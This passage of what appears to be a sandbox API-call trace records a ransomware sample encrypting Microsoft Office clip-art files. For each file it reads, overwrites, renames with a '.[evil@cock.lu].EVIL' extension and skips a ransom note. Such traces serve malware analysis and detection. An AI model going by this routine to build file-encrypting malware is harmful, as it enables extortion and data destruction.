Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185780.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0149.181] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0149.181] __uncaught_exception () returned 0x84b1160800 [0149.181] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0149.181] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185780.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185780.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185780.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185780.wmf.[evil@cock.lu].evil")) returned 1 [0149.182] ??_V@YAXPEAX@Z () returned 0x1 [0149.184] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185780.WMF", dwFileAttributes=0x200) returned 0 [0149.185] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0149.185] wcsstr (_Str="J0185786.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0149.185] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185786.WMF") returned 69 [0149.185] wcscmp (_String1="J0185786.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0149.185] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0185786.WMF") returned 0x0 [0149.185] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185786.WMF") returned 0x45 [0149.185] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185786.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185786.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0149.187] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x99a2, lpOverlapped=0x0) returned 1 [0149.239] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.239] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.239] _errno () returned 0x84b1160840 [0149.240] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.240] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x99c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x99c0, lpOverlapped=0x0) returned 1 [0149.240] CloseHandle (hObject=0x1a8) returned 1 [0149.240] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185786.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0149.240] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0149.240] __uncaught_exception () returned 0x84b1160800 [0149.240] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0149.240] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185786.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185786.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185786.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185786.wmf.[evil@cock.lu].evil")) returned 1 [0149.241] ??_V@YAXPEAX@Z () returned 0x1 [0149.244] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185786.WMF", dwFileAttributes=0x200) returned 0 [0149.244] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0149.244] wcsstr (_Str="J0185790.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0149.244] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185790.WMF") returned 69 [0149.244] wcscmp (_String1="J0185790.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0149.244] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0185790.WMF") returned 0x0 [0149.244] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185790.WMF") returned 0x45 [0149.244] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185790.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185790.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0149.246] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x50b6, lpOverlapped=0x0) returned 1 [0149.261] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.261] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.261] _errno () returned 0x84b1160840 [0149.262] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.262] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x50c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x50c0, lpOverlapped=0x0) returned 1 [0149.262] CloseHandle (hObject=0x1a8) returned 1 [0149.262] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185790.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0149.262] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0149.262] __uncaught_exception () returned 0x84b1160800 [0149.262] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0149.263] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185790.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185790.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185790.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185790.wmf.[evil@cock.lu].evil")) returned 1 [0149.264] ??_V@YAXPEAX@Z () returned 0x1 [0149.269] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185790.WMF", dwFileAttributes=0x200) returned 0 [0149.269] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0149.269] wcsstr (_Str="J0185796.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0149.269] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185796.WMF") returned 69 [0149.269] wcscmp (_String1="J0185796.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0149.269] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0185796.WMF") returned 0x0 [0149.269] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185796.WMF") returned 0x45 [0149.270] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185796.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185796.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0149.277] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x650c, lpOverlapped=0x0) returned 1 [0149.285] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.285] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.285] _errno () returned 0x84b1160840 [0149.285] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.285] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x6520, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6520, lpOverlapped=0x0) returned 1 [0149.285] CloseHandle (hObject=0x1a8) returned 1 [0149.286] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185796.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0149.286] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0149.286] __uncaught_exception () returned 0x84b1160800 [0149.286] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0149.286] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185796.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185796.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185796.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185796.wmf.[evil@cock.lu].evil")) returned 1 [0149.288] ??_V@YAXPEAX@Z () returned 0x1 [0149.292] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185796.WMF", dwFileAttributes=0x200) returned 0 [0149.292] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0149.292] wcsstr (_Str="J0185798.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0149.292] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185798.WMF") returned 69 [0149.292] wcscmp (_String1="J0185798.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0149.292] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0185798.WMF") returned 0x0 [0149.292] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185798.WMF") returned 0x45 [0149.292] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185798.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185798.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0149.295] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8420, lpOverlapped=0x0) returned 1 [0149.312] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.312] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.312] _errno () returned 0x84b1160840 [0149.312] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.312] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x8440, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8440, lpOverlapped=0x0) returned 1 [0149.312] CloseHandle (hObject=0x1a8) returned 1 [0149.312] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185798.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0149.313] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0149.313] __uncaught_exception () returned 0x84b1160800 [0149.313] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0149.313] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185798.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185798.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185798.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185798.wmf.[evil@cock.lu].evil")) returned 1 [0149.314] ??_V@YAXPEAX@Z () returned 0x1 [0149.316] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185798.WMF", dwFileAttributes=0x200) returned 0 [0149.317] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0149.317] wcsstr (_Str="J0185800.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0149.317] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185800.WMF") returned 69 [0149.317] wcscmp (_String1="J0185800.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0149.317] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0185800.WMF") returned 0x0 [0149.317] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185800.WMF") returned 0x45 [0149.317] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185800.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185800.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0149.878] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5eae, lpOverlapped=0x0) returned 1 [0149.887] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.887] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.887] _errno () returned 0x84b1160840 [0149.887] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.887] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x5ec0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5ec0, lpOverlapped=0x0) returned 1 [0149.887] CloseHandle (hObject=0x1a8) returned 1 [0149.887] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185800.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0149.888] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0149.888] __uncaught_exception () returned 0x84b1160800 [0149.888] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0149.888] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185800.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185800.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185800.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185800.wmf.[evil@cock.lu].evil")) returned 1 [0149.889] ??_V@YAXPEAX@Z () returned 0x1 [0149.892] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185800.WMF", dwFileAttributes=0x200) returned 0 [0149.892] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0149.892] wcsstr (_Str="J0185806.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0149.892] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185806.WMF") returned 69 [0149.892] wcscmp (_String1="J0185806.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0149.892] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0185806.WMF") returned 0x0 [0149.892] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185806.WMF") returned 0x45 [0149.892] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185806.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185806.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0149.894] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x773a, lpOverlapped=0x0) returned 1 [0149.897] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.897] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.897] _errno () returned 0x84b1160840 [0149.897] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.897] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x7740, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7740, lpOverlapped=0x0) returned 1 [0149.898] CloseHandle (hObject=0x1a8) returned 1 [0149.898] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185806.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0149.898] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0149.898] __uncaught_exception () returned 0x84b1160800 [0149.898] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0149.898] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185806.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185806.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185806.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185806.wmf.[evil@cock.lu].evil")) returned 1 [0149.899] ??_V@YAXPEAX@Z () returned 0x1 [0149.902] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185806.WMF", dwFileAttributes=0x200) returned 0 [0149.902] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0149.902] wcsstr (_Str="J0185818.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0149.902] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185818.WMF") returned 69 [0149.903] wcscmp (_String1="J0185818.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0149.903] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0185818.WMF") returned 0x0 [0149.903] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185818.WMF") returned 0x45 [0149.903] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185818.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185818.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0149.904] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8b8e, lpOverlapped=0x0) returned 1 [0149.907] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.907] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.907] _errno () returned 0x84b1160840 [0149.907] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.907] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x8ba0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8ba0, lpOverlapped=0x0) returned 1 [0149.908] CloseHandle (hObject=0x1a8) returned 1 [0149.908] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185818.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0149.908] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0149.908] __uncaught_exception () returned 0x84b1160800 [0149.908] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0149.908] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185818.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185818.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185818.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185818.wmf.[evil@cock.lu].evil")) returned 1 [0149.909] ??_V@YAXPEAX@Z () returned 0x1 [0149.913] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185818.WMF", dwFileAttributes=0x200) returned 0 [0149.913] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0149.913] wcsstr (_Str="J0185828.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0149.913] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185828.WMF") returned 69 [0149.913] wcscmp (_String1="J0185828.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0149.913] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0185828.WMF") returned 0x0 [0149.913] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185828.WMF") returned 0x45 [0149.913] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185828.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185828.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0149.915] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1e74, lpOverlapped=0x0) returned 1 [0149.919] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.919] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0149.919] _errno () returned 0x84b1160840 [0149.919] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.919] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1e80, lpOverlapped=0x0) returned 1 [0149.919] CloseHandle (hObject=0x1a8) returned 1 [0149.919] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185828.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0149.919] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0149.920] __uncaught_exception () returned 0x84b1160800 [0149.920] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0149.920] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185828.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185828.wmf"), lpNewFileName="C:\\\\Program 